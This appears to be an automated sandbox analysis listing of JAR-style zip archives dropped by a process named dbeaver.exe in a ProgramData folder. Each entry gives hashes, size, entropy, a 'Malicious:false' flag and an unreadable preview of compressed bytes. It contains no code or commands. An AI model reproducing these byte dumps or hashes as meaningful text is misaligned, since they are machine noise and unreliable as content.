      SHA1:BDE6FC8C453BF1DA0DFC77863B0CDF08C9F0AFAF
      SHA-256:B1DD5C294BD49EF6D84128D2F468AD39F1C450C2AF7B7F6678DF3D385CBF08D5
      SHA-512:C0382E1964AD984BD3AC0A82EEB6D4EA98E611B9CC7599FB789F748CDFE1D07249884DDE82EC21160DD880BAFEDE9824F554C84D5412D8911E9BACD7E38FD93D
      Malicious:false
      Reputation:unknown
      Preview:PK........i.cW................META-INF/MANIFEST.MF.U.s.8.}w...qf.vz. "..~U...(..;!...BC@._.^.........9....aD}...%<.,jVT..K]N. X.....f$..9....&7d.\.4.......T|f.."..i..y...&0$..ow......(.B.....4N.L.2b...0....`Mn..97...rV.5MU.&....B.R.....J...(..E!.D.b..:}.\F..3...D{..%/O..C....j.d.....=...4..$>...d .o...{..pq...K.+N..jW..'...E4[,>.0..$...|.K.T..0..1..m5~%..u^rX..y!>.$B$iV..67T4.B.ISQ..m..,..N*...>.....1..?.Pl[U.F..D.....}].I.O.nZU...@......p. u..G.#...0......y......`"*...\.%..B..YY.T.KD.p......$.Q.."$g.jzC..M.....D.k...^.S..t{.8...|.....K:...B...!.=..y+..gF#..................#.....[.'..[_*g...>+EX.iO.....0&.U..._.H{...x...<5......|..Y9...a_.uJ,msX........z.c...F.ES.5....Gz..Ya..w..1|....,....=......ha$..v_..c..&.......l-F...F.o..-S].=;.x...9.7R..v..(3.... .......{......8.m;......#x0./n..e...Ses0..a..>?jk.....l3.$....-.Wa.w.Sg`I..Y.T......pA..`...3h...yaoc.0..w;.}O....kq!0......PK..`..6}.......PK........i.cW................META-INF/EC
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):43389
      Entropy (8bit):7.872072437938019
      Encrypted:false
      SSDEEP:
      MD5:994964CDD57AD3CACC15556353224914
      SHA1:7783052F8230422581D6C23204BD770FB92C00D8
      SHA-256:A9DA3EAED58A784E398B8072084C8DCEC67B3D54BF3104444EC866EA5E4D03FF
      SHA-512:7D59866BD367946873F7F98B84592091A0333F29E2C689B2CA05BD70B468F2F5E8815202259FAC091DE05847D7EB47F6251EF412A7F8DA28EFF32A7FC6E10F53
      Malicious:false
      Reputation:unknown
      Preview:PK..........\W................META-INF/MANIFEST.MF.Wis.:......&..S4^.1..*.}u...0%.....1..#...W..}..{..=..J....a..K.B.s+9.b.......B}W.@..\....C..).b...ek...).>T.[).s5..FG..H.ci..X...l........a..,...-...!...m.!.`.R=.).`.....Ra.........C.%.g.*...g.N*."..8.Ad!....F.....B..@.Wr}...U..=......e[.......SN.l.Q.......K..H...s..r...{|`..*K...u.s.....p..#....@......6.a@...0.>......(r.?x.!..?..S..b(r..@.GP...*.O.<E\/..V=..@2c.t.gI^....g.C.t..O....ANU8...k^....a...d..C.3.XJ".q{.....:.(.T.I.._x...W.m.x..3....i....y...d.MaD.....@....w.....'.>.'r.W.....-r....yAM..r.(oP..QK*q..... ..V&./..K..ozJ.f.>.}....O.Tl...f........]+.,...e6gi.<<%..Y.g......Y..f..6 H.....T6d.w.J.....".9$<.0..w....:..d/B*...O%..N.p....+4M..H..!}./.6...........E.|........P.[.{.5.3..O.....".."...X..U..(.<..........e.(.r..R*..])CA.....P.=......Y....I*.Z..6 .!.r.V.....r.Vr.."eR.=....u....."_.;.g..y{....j.D.(^.).g..3b.Q.|.GM.$.4x...E..L5.W.....m...$z.............*m..*7.q.Y.3.pS...N.,|.o.q{.L
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):13321
      Entropy (8bit):7.750961893091043
      Encrypted:false
      SSDEEP:
      MD5:8B44884775CFED8998A58C6D1D9FB856
      SHA1:F203F3ECBDB8AD9F8D67AA368A39F9D0BF544FFC
      SHA-256:66B26E24EE123BDED06C6AEEF86D99A3526CE73EEC7759729DC38C7C2EB5B2EC
      SHA-512:7C1AC0FB524B9F6188954E3E094AA20886F615EA21EECB746571B24B6A275C04E73088AB40F8274F4EA78DCBD4CBFA23D328C8C70B77C28B089B15145F709504
      Malicious:false
      Reputation:unknown
      Preview:PK........f.cW................META-INF/MANIFEST.MF.T.r.H....?(...[+.....X.e..3..&jID..R.Jb...........%3.O..P.V.J..D.xl+.fT+7.........b./.. .....je....c.U..Hq.].b...b^ .K..E`+.%a...|.d. .\.9.sFA......!#..\....%)h.....Q..^B\2..)...dA."...*...f...[.U7M..Z....O$.,j'%oaC...Kz.?2&.:{ YY..9.<. ..2F9......'\Hu.....Kz~....[.Q.p.s.Bv<....@A.V.......EB"... ...OK34.[...^..)D.?.U+..<.Y.k.).O=.=..w.V+.L.BT....e....sZ.y&..`..b....$..&.Ij.z..p...j."....r.<o1...N.\.j".%.@.'.R..e.H...DA..^....F.`..ti.......M.u....M@...m.h..p1g.i`\.T+.?....Kb.2......3...QZ....U..R.,(6.V..xxd|.zd{..7....M.`.......Ckw......".3..e......u...o.M.=........'D.7....c.......m.b=....?.u.D...~..{x.YB<..*3.....'m'N.Y...G..6%..,..^...i8X...+..O..w1...`...G.{0w_b~.G.~.1..;..x;...........ke.../G.,'......J._.R".i.~.ub..mg...>.{.]..;./K.u.c.9^..x.wF./u..?s9..#.u.A...y..;..+.....5..V.....\...s.....PK.....V...C...PK........f.cW................META-INF/ECLIPSE_.SF....0.E...?.L.e..qU.L.1.!.I
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):64434
      Entropy (8bit):7.900785684657291
      Encrypted:false
      SSDEEP:
      MD5:30099026A588E86E01D3075F9B52FD97
      SHA1:0AC9014E931198D8D8435825D47FC4AC2CCCDDEA
      SHA-256:9B9025CC49B42926AD6AE067E5D4F36CE5889F18FE2BF6644571D8FFA9D745A0
      SHA-512:B41FE3C0C5B5AC16DECEDFE7C553292B9ED6DA3F4DD7C9B7B300D77FB003D912284168981A07647CF0A5D3225B1F0BCE3B525B83A36C8D1882C0AAB1AC1B080B
      Malicious:false
      Reputation:unknown
      Preview:PK.........JeW................META-INF/MANIFEST.MF.X.r...}OU.!...a.K..*...B...~8.@sQ.. ...cb...2.yJ.={...2z......TSa....y.p....!@.u...2.?p......x........-BhT.Z.5..`M~.<C..[.b...k..=.<...C.s.... ...?...u..:YoP.....C..N`....v.....|3..{q..&...J..<....t......^..G..8x.,..s..n.M!.Fz.......}.y...,..1&B..1.M.....;?e..>?Rx.'...fv...j.'i.zne~.Lu....}..9......t...37..>G.U0<H.*S....j...).z0q@..wg.<...;.-d.T.A............N...p..~.^.<.......x......8...S.&..z.*:.1..9...._s..;.#...#G...5.~..n..[h....E...!(......$.^k...............W...s.tL1n.U...x.{.......j...}d..N.............`p....;.E....Q..3=7.%..Nk.E....C...7`.yH.}.vQ.A(L:.Q..zurO...B. +.....'..5.....r....G.....I..}y|B.~~.+...I...H4..T..P@..4[-...E.z.a-.1Y...&h..J@....~...4q."...0]..XB..!.B......n1.ju.Y.v.....oWl.(.gM.oO..xkA....*.MVJ.&.IS.....`W.\r.t.8tY.3.q9Hx.|.Hz}.#{.p.zL9....&.t.....M. .._...8...5..:.m...2.`S.h....h.Hl.9P..gP.;..h8.....o_...M.~/..d.6....=w.$L.0R..2.,.....R...J{...G...... ......`..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):73470
      Entropy (8bit):7.790515617460026
      Encrypted:false
      SSDEEP:
      MD5:A45946AFE2D8FD5C0A16D821710C7418
      SHA1:2BF98F56682102A9F5AD3C8E5A5D5E9AD4AFB125
      SHA-256:7FAB11AF4AD954898067CB8E67C7865D4541B0779A0539BAF7E699BB00ED5D2C
      SHA-512:7C5747F1194DA72A3EFC5EAEAFFE7D540783FDCFB0D3A218D2420CC86B899EC3C01E35B534B10443A1699DE58A52E3B22EA48336EB1FEB97B926006BACFE9A70
      Malicious:false
      Reputation:unknown
      Preview:PK........o.cW................META-INF/MANIFEST.MF.YY...~.....v.{c..K.A.:.F... (8.}.....$..?.VYV...}^..s..o...!A.C..iv..I.E....D...K......D.......W...l7./.1..[.ck{.....:.o..{.Q.Y%~^R...|...x.....L.S..D...LARx&H..^.. ...fI..*N[.;.s.......V..kITx.H^......A..N./.>Am.M.E....-.C[.8.=...+.*....._?T.....^.,..f^K.a.%Q..0{.......FA.%...[..l...dzS..(;..Q. ....x.m..[...~.....0..u..!Y..I.R.;..'...H#.b..jWGq}.....M.:.S`..0r.Y....^.CM/w....k.i...?JAM'..3.......d...5..jz.. ._z..._\q6.j:...lmJ3K`.A..H.;^...._...?..Ub..0*av....qb.Y[....F...8.6H@X'.;[..p..Md.?.._....OIkyW.6.0..Pf0.l....6xP>......x0...__.H4s.Y......t.]G...nDyV.X.?-...../.]..C.,e.1.y...pCMW..].x.....)....{.i(`.i}..g`.7....j...M.....T._..X.[.XX[..l..UTO..|\...w...~...kY..:4..y..8&...\.{G.&.........j.....K.....V...N.a..S.X.a.....2.a..>......+.-.......+%e0..M8._.2.+dO.u.....c...B...w..C......?/.~....cVd..y.j...k......gX.}.k2.gQ...bd....-...T.<1..\|..R3xp....8}@...77jT....:....s.{......z..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):55251
      Entropy (8bit):7.888592647161668
      Encrypted:false
      SSDEEP:
      MD5:D2581883D3805B372183960CA6B0DE1F
      SHA1:D07C6E94CBC6837A96D1A933617AF5DD12C7781B
      SHA-256:71678F8B9389D4B4C3928EF0E9E049FA2F3BDC42BDE4B28B84D300FC4C9E80BD
      SHA-512:583EC09D63795BBA6310AFB09BE199F64F78270CFE7829BBC82B5E3C6070C0CBC0252FA0CA1EA0524ED08F598BCEF04DD890D9A81CC086C38449128CAE3CC2F3
      Malicious:false
      Reputation:unknown
      Preview:PK........\..W................META-INF/MANIFEST.MF.W[..J.~......O..).N..".x.....T..\-.D.........!Uy.*.....y.JI.D8........E.........E...r._..x.he^.+:.+F.@.&..".......$...Y!j.....u.8.v.x."..-.@.%).Q.F.C..E...8K.h.e.g.*[g.....Un.....T..2Rj.Q..8.QD./..[.Z9....\........A..q..w.?......y.}........u....._.y.*|Qx.>..8...^.JKW.*.7J..'.HbL*......@y.A8..K.~.........-..N.vQ. \*;.C.L.o.7rRZriR......<:.!..C.}.E..F.W..t?....O.].....E<P..0.2.6...j.3...9..(P.|IA..z.....M.)...}&..a....qb|^(1_.....U..8.y{..2en.y.A...k.$oi.u.}.q&.Gz.M...!...X.A...V...#A..`...-.._"y~....*.jL......Q....2...i.Xi..dt../....-..|...<5 ..|{v..a..l.Y....rq..(..b......APz/.}...v.A y.......;]...&LV.Lnp......C.T.,.@2l.Z..2....+.sR..$M..c.+..5V...j..$.v.-u.........~..c5)...tZ.[1HH..F..u.U.S.A..hL.;.Nw..+.S.<Lk..b..u.Y..........^Hz....:.....d.d.(.h...`f:.Bb.[Y~,......[ ..R5.(....f.0......1....~=Q..2.....s....5-..I....... +.G;dw.iu.Q45..g...?M....I..<.......x.N.Nd..,..ec..l.F....5.....Z`0L.......m
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):49675
      Entropy (8bit):7.915616440664387
      Encrypted:false
      SSDEEP:
      MD5:419C01D923EF54414F8552A0EB8D2AE4
      SHA1:724D0F7E45B07BDAA49E6ECA6D15DF4F8840A64F
      SHA-256:75A7D5D1E848D8CAF6664B6026E400A85046FCA9025CE9A8BB86F28966B38F8A
      SHA-512:4E716E23AC810182148E2457207D410A901E45B0D22B69A903FF45B06ECE8E5522049E942D24EEBEAE319A95071261C94697EFF8519D776207E3E4955F7D2B9C
      Malicious:false
      Reputation:unknown
      Preview:PK........U.^W................META-INF/MANIFEST.MF.WY....~7..`t.y8.#............F..........m.cwk.....././....#.F$..8B.......ia..4...S@..\..6J ...S.f...F^2...B..U.3.pa^y.@./"..i...!.`#.`......2.gb.h.7.oEO..t!.......p.....9.I.\.T.J\.......?..[.O.\A.F.S...d@.N*.:p..../g.p.w1.........?A8.=.FN..P;..J4u....q.5-..N.lF.........h.[..L..|? /.O.9.....J....1..?.T...z6.#.4.+..........>.).....}..D. N..#...w.[..H...'./....-....M%..pO..}6.JD.\......v....]...?........-.}WV?....g.Bjw..@7..l.n...x+....zV..._.KO.....]...].f..R...r.P.....o...L..{....!obD..j<?|.n.....A_...n.]... ..S~?.R......{.9._.y.*...o.^&.*...uF.(.7...Q6.I.QF........%.|.W...p.MJ.O....t.a!........v..s...C..3...M....,uCM.B@..sKG_.......H.I.../.8..).\DD....Q.5.^75.fTJ..l.b.(....B...l&.9g.. &.M.V..|.\..E.W#W.4..D..ZU.,X'Ru.....:.Z.ytm...l>.B.....B............;.)..<.("...].E.c.UC.F..."Win*.bw...+.6..A...Y.!..{1...y...A....]..I.'...aO....p.-..C....]..c3....(&#s..,.U......z..Q8.lG..f..9.c.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):224567
      Entropy (8bit):7.824785811522963
      Encrypted:false
      SSDEEP:
      MD5:3B2966C6BC075EF2F8E3F4590E2859D0
      SHA1:86AAB461A0DE29D06643D18E12B302A7C9DA9E22
      SHA-256:8F499AD4FE97BE471B8E5AC1D37BDD398B5AEF2936AEEA8AE2DDB5A575B5A674
      SHA-512:70BABA690F2787D7D5F4042B1CE78D4B18BFF517E950AC11A4F91925062987A30AFCCBCB626884965A97DA6066D2273CDE3F312FEEB9DC51BDD05B07F63131AD
      Malicious:false
      Reputation:unknown
      Preview:PK..........YW................META-INF/MANIFEST.MF.|Y..X..}G....x../x+AP.....P@.e.....y.Y~...*++55..ME..f...g-..,.....e....&...-K.].....7.l...Q.A..7..}.......;.......g......5_.._..N..'.-......\;...}p..M.`W...._U...[.W.].......S$..f...~..............Mn.I8...@O....YP.a2}.!.!..@..;."..T_.e.]4....K.....-33y...o...o.~....x..+.Q.....x....M_..W..'.....3m..._..JgA.<.M....?nC...F....u.V..iY....^^..E9..x(.z\.......x..o.{.W.d;.......r3;...q.....^.Y..n.>.z.,.}.~...g1.tA'....o?..$...x........~q.w'>.........a_....'7xwN.L.#..6....^M...p.q+..|..Rp..^.....e....m.8...s.W......E..H...f.}.......2o..G...$>...o.......3o.............L...W.g....x.w..h.?..U%].u\..K.2<......#..M.&O..5q]..8~%..vl.?8..........+}..o..9K.$..:f._qN..O....}BJ..1y@...{...!p..|....~..o{......t=.m.........".YO.....3y..&.........w.........w..y............/W>..1.du...]..?.}...p...s.6,.,u...o...........q[.w>w.W.z.G....w....7._6...*;....?....?Ap.;h.......Y..>...^>;.f......x.j.^..j....f..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):30863
      Entropy (8bit):7.841018598541576
      Encrypted:false
      SSDEEP:
      MD5:15241E8AD79D49DF6F2DE2829528345A
      SHA1:380895B5D91CF2F6C8CA6556A44AA9CC251C8252
      SHA-256:903E4E9D2CCFAA15E1C29AB86531094C17614357EB421F1D13385AF0E413DFBC
      SHA-512:0525284893CA91CF2BB6DC2D5429E7032A759AD2D5546C746808CA03F0B1E0487A663040E8E058EAD80BA833C0E4F4F3A470F3398A1A80D55BC268887E624D30
      Malicious:false
      Reputation:unknown
      Preview:PK........r.-W................META-INF/MANIFEST.MF.V.n.H.}...`..U".wcb.+q...p...j...7.mc..m..2....aw..sN.....0".#....JA`..&..@.il+..H._.c.A....U..F.\..[+F..I...;.r!3z.<@..#}.....{..J!.6.M...d...5...6.%..`5B..BB!j....r..YAfE.g...%^.$F(..!0/.W..6.#...pv...Y..8..&p...}.<.p8...ah.Sh.YD.O..|...R...m&..5...>^.^.j.xI~....=..d.g...o....)A.r)..+..Q..3..jP..yb...,..O.U..m.*Ezo..B.8A&d.......M......w^e...}..r...U....O..E...M=.@}.$(.2.\D.......&...+..3c},YM...{.......L.%F.>Q.v.9v.....[...b..1%.K...k0.<=?A.....w."..Q..k..\j....A5..........z>....]`KTW....!]..-.".3....d.....P4A..."BE..).U-,.K5..^.}...2.......k..j.+.\...L;...Y.I.Q6Lf.X.a+.Bfj......p..TI.Q...^.F....F........^....d.....4.....ES.! N.*...'c...J@&]....n..ViY...U..S..-/.-E]..W..KS.L.$.z..h........[.....q.&Gkroc..s..g>...(.#.3bIaZ...R...Q..A.....g>.........;.2...u.P.\.B.. .. .".....QS....Q{j.pPL8W..T.!....i...|..0.....v.)b.3..ZzY/q.9.g.j.-.41.$..........b...o.SD....I...R.....PG..f....m
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):210503
      Entropy (8bit):7.875331267777037
      Encrypted:false
      SSDEEP:
      MD5:E7D3E3BA04C28BF6403A10C69BDDC3E7
      SHA1:B3C5AA576527EDAAB69BF13EF41F002570EB81C4
      SHA-256:686C407A24B785FBF6C680AAD9C48D566A39516854345C64506CFCD1B65F6D68
      SHA-512:AAF455111500260354C290D2AFDB9A342B25221A8EA74D724ECCDE7C60218C44D757A82CC6A4509D8D962D200236D83DC172538F4F4122B94164196333B1A81F
      Malicious:false
      Reputation:unknown
      Preview:PK..........YW................META-INF/MANIFEST.MF.|I..X...".?dT....+.=jU.N......n...../.>...zs.....{../R........U...}......J.=.+9..E.Z/.B.N..^..y.....#.(v......{.l~y....U|..uK..'mH.,...J...de..9q.W..>4.SU.UW.]Ei.{.....l....[.......C..0..0.........y..Qz..-R7+/..Y..^..B.Xq4Z..)O.......*.s......e4.P......^.....m/u.?.....%......]6.T>muY../...F^W=LW.....l.s.{.....u.%.O^z....r".+'A|.....~V&.+>...................:..\..5.....O...w...^:.`.......'&^g...>.P....4.x..R.A.O..vz}.m..p~....p........N......d.d..'..-....N/{T..../K....]r..W4..{^...>..Qz...{.;._..WeM.| ..n9....*.....N.^^..4........g.^.........T.h........}'+...'..>y......|.N....e.....?.............oqr...l.:J....~..^..}.c..L.9...L.Fe.&^Z....ZKc....SG..S..yr..5....%.=.....g.<..!...-..W....,p..h.,..q.......\.....!......TN.W....u.W.......'.%..^_../F.x..g.S.%..V....._+.*%..][.?.p...}y.8..$.......l.F-.sq..%..<.....s.Y..|i-........{.......M.L...i..*_....i.....I.4Sg..\.+...&;...W
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):18659
      Entropy (8bit):7.743334774597873
      Encrypted:false
      SSDEEP:
      MD5:B809016B3D82A16A8C8B1595D281B3A5
      SHA1:D8A1DD8091EF6159CBBB1302313197626BC42C48
      SHA-256:6C0BB462230E0DF6A60DE4C1621BB5B6568583689C84BED86975FBD01ECF7D52
      SHA-512:61CEE4095777C23601CBAB70D481C8924CB62738CB4B242A970453789F91446E1E588373FB5517805D5E2FA8B48A86CAB518444B91E3A80E0C6AAC2F5C51D252
      Malicious:false
      Reputation:unknown
      Preview:PK........@.^W................META-INF/MANIFEST.MF.V.r.6.}g...L.I..+.[...0...\........rl...}e .9'$.......{Ib.\b..s....."..T..a$...........&..3y.(*..}H.$t.V0=.yX).s.......R}[....f..pM.d.2...~... ..X.S....v.;..-...:......1t..`.....\..e...,..*.yE..*...}.....#}.a...nD|..........).!#.Q.(Q....Nuv...0.p..\..l..H.....:.e.VEY......r.4........Y....f.......RvT......h_......9.v......... .<...G|.....#.......g...#sJ<......Y7...^HF.n/...<NTk.......AyG.c..L.#t.-.K8q.......c&.=.'.wN:u6....X..0..c...q..e,.p.j-{.....q........9.."..7....Ano...CFw..P.P.....m..f...>..la.....L.w.5aU.1/.J..m..D.t..<.0.....w.~.K.x...]... ....d..X...A.H...e9{.v.uP..R...P.T*...Q1. ..UEy.*[@VT....t.-X..6KZ`....&Y.K..).Vf.f..Y25.<E..PY...A_n.....(.{.^{G.._..pA.....0.D. ..gEM\.V....~..qw.F.K...l.]KC..KmP.}..j....^.vE.(...{..U.....=....`*.*.=i5.%ky.......#. .@.x...+..!..c.C.e.........U...h..G....?}W.Qb.......x.L..=IF.6..E\..-y=~....b+...M[../^..;.oJ=...$n.j.1.>...r.Gz...._D.8.E=
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):60055
      Entropy (8bit):7.871463764035144
      Encrypted:false
      SSDEEP:
      MD5:07C025CC21A4B3652BD86ECAC8BC8978
      SHA1:C1234821A8DD8D23460FED535CB8E4D186E188FA
      SHA-256:95EC54222A494FA64645446A3545A85A106C9529597DB77A57DAF9BE8E19CDF0
      SHA-512:4046D53BB8878C16AB4BCE75BBC85D65DD3DCEB32AD26D83B0D3ED9E45F647DB39F5B0CA6B5ADF806A2210B63C051270D74C92A2A6CCB0301E19914253D704BD
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF.W[s.L.}OU.C*.....s.T."*(^@..|.4..r....r.|uB&..X...z.w7:......8.a.p.t...9F. .=(..t.......P|.u..3.)....\.f.`.&>.......oK.o...G.w......7f.....0>v..p....;).8.x.1y.../.ah...4.."+.....3.5.1r......J..8.|...;.d.T...oP...#.8........x.....y..7J..1i/....g.;.........1....m&A...@._E..uX....$N?..Nx..WJ:..S.G...$..=.......z.ng.....:Lm.......Q'N....b.^.s{.OI.....:..>I..<.6.4..@n-Y.Q.p.@.....(y....).k.>..V;..q..q.&.....#J..+.....E^..../....U...........>&...ey..4`%Q.l.g.P.m.G....@...z....y..+W..T....P/..S.(+..=`{h...A..Hj}.I........2{.[%B.B....UZ.. ..hQ#w...g5S@..#.`..?#...{....Fu.$...&...D.(...\...@SSt.I:B;=_THVm#...9..1....._l...H..nb........(]....<Ec.w.;qq.._R.}.R...u....DA..|.p.n..K..>....[.j|...L.VJATz|..#....9......nr^..V0w.2..Xehqs..]..s...........m....u..PL0..@..SU\h..#...............V.u...9.....I..]....q..eP/....F.wzQ.].]u1....j......L...8.s..........}#.V.....9.h.y/..uv)7..M.0....=..a...0R.c.g.X.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):13598
      Entropy (8bit):7.738201208828914
      Encrypted:false
      SSDEEP:
      MD5:390FCE3D8A7CD6DDB78C242188AB56E0
      SHA1:A82A0045306E90D5578F7380FD9AE9F2F8AB3288
      SHA-256:7323086D8EC6E6B27A5C9E0D2001DEC419E7A6ABE91C3C7D52BA1EF81861EDBA
      SHA-512:E3357E77085A5FBD438551F1E30E48F25EE480CAA38195640E7E52A5C2ACF2163C3005E4BD87438D40058C3CAFE5FD9876B3BCA0AF0D034B238376D79FB516AB
      Malicious:false
      Reputation:unknown
      Preview:PK........#..V................META-INF/MANIFEST.MF..]o.H...M...d/6=..bA.....m..l...0.0........PZ.I.d.w......y.QAc"..H....4..n..$I._.z..jRh..SZ....e.qU.,...N.J....v&.d9...>....K..Oc<..g.....T..4."R1..........!.(./....L.....V.:...Kh..[.o'..F.1........D.=..T.EM9+rRHO[...S...{...~u..'.W..9..-.n..{...5... .......W-...sj.S<j..7..X.X..Q..Q..s..:.....q......$.I.....w.D....B..z.j.xs.;.#l...z.V....'.*.....J/....a.sZ.....N......A%h..oM.%..H..^[.0.nRo$Q2...Q$.8..ao...T.ql.}.Cd..;..a....c.....EC..k..t;..U..2....D.....M.{.....A.7.........0\EF.9....,]D.......PI........+w........~..]..`>.fU..'.....O/ ..'...#.......LX.m.@.YI..D|Mc..n.!3g.....v..?.[!...A.O.M.../.o.4....3.mT..X..:....?9*...*....3...`..D.a..C.^..S%...y\g.].ep.&....u.H&Rr.V....Y..N..p?]...E..[.>...z.0........[...PK..oIA.....x...PK........#..V................META-INF/ECLIPSE_.SF..]..@...M..\.18...&.@...."*.4.Lq.a.g.....Ic.....y..|.8.PV..;..ft....vk...(U.Fh.n.T.....@...R...n.sK...w.!!.%..gS....R.5.9.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):406235
      Entropy (8bit):7.899110418489369
      Encrypted:false
      SSDEEP:
      MD5:E4517FC71F6E73C1784C21D81D7F3602
      SHA1:244F0D880F1360F2F8C9C8054D9DD4B42DB0B704
      SHA-256:59CE1370DEC50DC810DC3E29E5E7A4431A10A38A21D91241F21098741120EF5D
      SHA-512:F358DFEC5B61CFF034AA0EFD0B71B839021823133020D2BABE5881860D8A42D30D34073F37BD8C4E65F523D0D5DE7B47C2AE36A811580BAB222AD007692B3863
      Malicious:false
      Reputation:unknown
      Preview:PK........`..W................META-INF/MANIFEST.MF.}Ys.J..{G.w.q..a...&......@..X..<L..."..d...*....'.Rfr8y..Y2-.E..m...o.,........L........C.....n.(......~......k..i..^...../.......$..+......_U.qq...7.;e...#.&..Y\..7.....g..e.:~.F.i."...........~[|.!..@.......`.q.W6WZ.r.=.yA.t.,...a.Gr.|..u.7...._G...7e..E....{.5..+?.*...vx...3..4........s........~............J.p.....^....6.[..e%.B.._....*......e.........x.}?.<~..J/..r.....|Yi...ocew.."..~.U/.q....R..Mag....U<.u.....c...0..g.=2.7..U.~...uY....,._...W.......}.xY...HW.......yy.`....Z..v7.......Y....J.S.|...Q........;......*.?....$.......n.+}.j>h.r...\V.....+O/+}.._.....<...\....zy]M^c..<..C.....e... ..X.;e..c....>..n.......)U{...yo....~.....Ac.W...o.>.......C.?V....>.}2.h..?. ._...%.w.....E.....G.?<F.............7..../+....=Lo.f.]..m>..2.7&....>..*c..4.........^>.p.tO.b?)}.L/~.I.."..u.o.o(........{.......#......Duw...Aff..?.A.]._>w..J.../.k{......ie......p......n.w.w.G]W.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):214831
      Entropy (8bit):7.887527286274996
      Encrypted:false
      SSDEEP:
      MD5:B303F0F040664615493C32DC9DD510CE
      SHA1:6A634678FF0ABBCE9511CA0C4DF3353DCCB3B09B
      SHA-256:5C6A8A37D62EA74C5C9F4F686AEBEC2E077D66AD9009B1DE0B3FB7C51B7499A3
      SHA-512:ED055BBCF781B0CF5D2B6C7BD9867D40E2F39BC36DF8E7F53DDDA9F15A035D728CCD53628E0E7A428EE2E390B09FBDB17CDF54A7DC8CB8B8C85316D568268D3B
      Malicious:false
      Reputation:unknown
      Preview:PK..........^W................META-INF/MANIFEST.MF.|Y..X..}G..pt.\L.u.}..v.........}.!.......].~c.J.t2O....^...0~..~......../L.yc.~./.|.z...@.A.......=...BOY.~..G........:,...5.,.}.e^*.).@....M.<EA..C..!OS...M.G....I..._.5.S.e./k.O....O'..`......._.{&..rJ...........Q..]...2.z.'".?...#..>>?...A.GOa.......~...'.......|...W...}<z.c/..{.......~^xn... ..O\.MUyu8.}..W...?eA4,...........oB.P......a....i.~...o...;....D>..A."..m.3.."Um..5/(..vX.Wx..=yu.......nR......G.:.....7O..?.E_^4#..Q0....S.7u.....6..3.._...........n.Uz...p.o.^6._.1....in;.?....QR....U../.46.Z.q...........f3.AdDq..N,...0...I6...c;..^.>......b....._.+.'......~.g.._.=...^f.?G/..7............]..Q...|(.C.#......1.......c"....q...._......#d=e_...^>.Y4Sa..OA.}..H}.P.#.%7...}'.=X.........}O..uk.(49.=:.l1.p...7..f<.:...o..?...v.Om.|O....n...v...J...HG..".1y..&.T|.....f.}..2J...n.}T.....mSgcs.z.$.>.}..2^....)...0..6..`.a.e..*..+B..i..R.7...M.Y.O..x..R.1{'.5..6NP.)...h.....M....m.%
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):27058
      Entropy (8bit):7.7540214597843145
      Encrypted:false
      SSDEEP:
      MD5:0AACB32322BF9950A191619AA8B2760D
      SHA1:2C977B96B33573D4399B634AB6ABE5E6AAE9170F
      SHA-256:021AD63BEC6394E64628D1093274FE0EEDFB6177E6AB47CDCE23AF3E840DE597
      SHA-512:3D370C2F0D054A19C3B2CC3960EECFD5C1D5B806043F1D914BB554A2A063EFAB3B4650D7B789416CC5660C58A5386C334B76AF9D59FEDD49A944A2519A84A280
      Malicious:false
      Reputation:unknown
      Preview:PK........C.^W................META-INF/MANIFEST.MF.V.r...}w...K.h.....D.."6..X<..%U...Q*.}.-....=...*....Iu..........~1%r..]. @....T....R.=.+DR2.....r.].i.E.."...w>tQ.s.<CJ......].b* S....#.!..1.!..6..#.O]D.w......h.8I...$H.(.BF...........O...|....+...:m.6p...}....P.)^..$.V....c.-cL..n..'VU..I.{..T..@..I.ya@hF...L..9X.B..|?.{...!.R.o.c...s.'<...L.?G..].^Y...Iq.h.9.....Y\...3...M..........+......k..u+.$...|.=[..#.{$...A.{...>..\....0.$.O..... .`.n90..`~....n....3f.....6..`&.XJ....w..s.......'|..eH.H......N.......!}..!7...9.kx.t.p..?Xg*....?).....5....j.U&.".Gj....r..}Wh......l\..g.`.F.9.`..a.........SJt..o.n.U.9......L<<$St1>...F.V\.4#*...j.......C.9...%..1......4..z.3....%w.JL....~.....A.I.E.Td{.)....aT.y.{.[I...,...:.I^0...wI.....:+......a.g.......R..->.B.9Y..j...$[."xR...O0'.0..$AYt.. 